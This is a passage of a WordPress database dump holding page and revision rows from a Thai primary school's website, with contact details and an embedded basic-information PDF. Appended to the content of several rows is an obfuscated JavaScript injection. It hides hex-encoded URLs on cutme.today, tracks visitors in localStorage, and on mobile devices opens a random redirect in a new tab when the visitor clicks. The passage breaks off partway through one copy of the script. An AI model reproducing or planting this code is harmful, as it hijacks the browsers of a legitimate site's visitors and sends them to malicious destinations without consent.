{\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-07 14:19:30','2024-08-07 07:19:30','',14,'http://pakhaeng.ssk.in.th/?p=648',0,'revision','',0),
(650,1,'2024-08-07 16:36:43','2024-08-07 09:36:43','<!-- wp:file {\"id\":652,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ข้อมูลพื้นฐาน.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ข้อมูลพื้นฐาน.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"ข้อมูลพื้นฐาน\"></object><a id=\"wp-block-file--media-7cf3b6e4-f25f-4be3-be70-c52761d10d2a\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ข้อมูลพื้นฐาน.pdf\">ข้อมูลพื้นฐาน</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ข้อมูลพื้นฐาน.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-7cf3b6e4-f25f-4be3-be70-c52761d10d2a\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ข้อมูลพื้นฐาน','','publish','closed','closed','','%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%9e%e0%b8%b7%e0%b9%89%e0%b8%99%e0%b8%90%e0%b8%b2%e0%b8%99','','','2024-08-07 16:36:47','2024-08-07 09:36:47','',0,'http://pakhaeng.ssk.in.th/?page_id=650',0,'page','',0),
(651,1,'2024-08-07 16:35:07','2024-08-07 09:35:07','','ข้อมูลพื้นฐาน','','inherit','','closed','','%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%9e%e0%b8%b7%e0%b9%89%e0%b8%99%e0%b8%90%e0%b8%b2%e0%b8%99','','','2024-08-07 16:35:07','2024-08-07 09:35:07','',650,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ข้อมูลพื้นฐาน.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),
(652,1,'2024-08-07 16:36:28','2024-08-07 09:36:28','','ข้อมูลพื้นฐาน','','inherit','','closed','','%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%9e%e0%b8%b7%e0%b9%89%e0%b8%99%e0%b8%90%e0%b8%b2%e0%b8%99-2','','','2024-08-07 16:36:28','2024-08-07 09:36:28','',650,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ข้อมูลพื้นฐาน.pdf',0,'attachment','application/pdf',0),
(653,1,'2024-08-07 16:36:43','2024-08-07 09:36:43','<!-- wp:file {\"id\":652,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ข้อมูลพื้นฐาน.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ข้อมูลพื้นฐาน.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"ข้อมูลพื้นฐาน\"></object><a id=\"wp-block-file--media-7cf3b6e4-f25f-4be3-be70-c52761d10d2a\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ข้อมูลพื้นฐาน.pdf\">ข้อมูลพื้นฐาน</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ข้อมูลพื้นฐาน.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-7cf3b6e4-f25f-4be3-be70-c52761d10d2a\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const 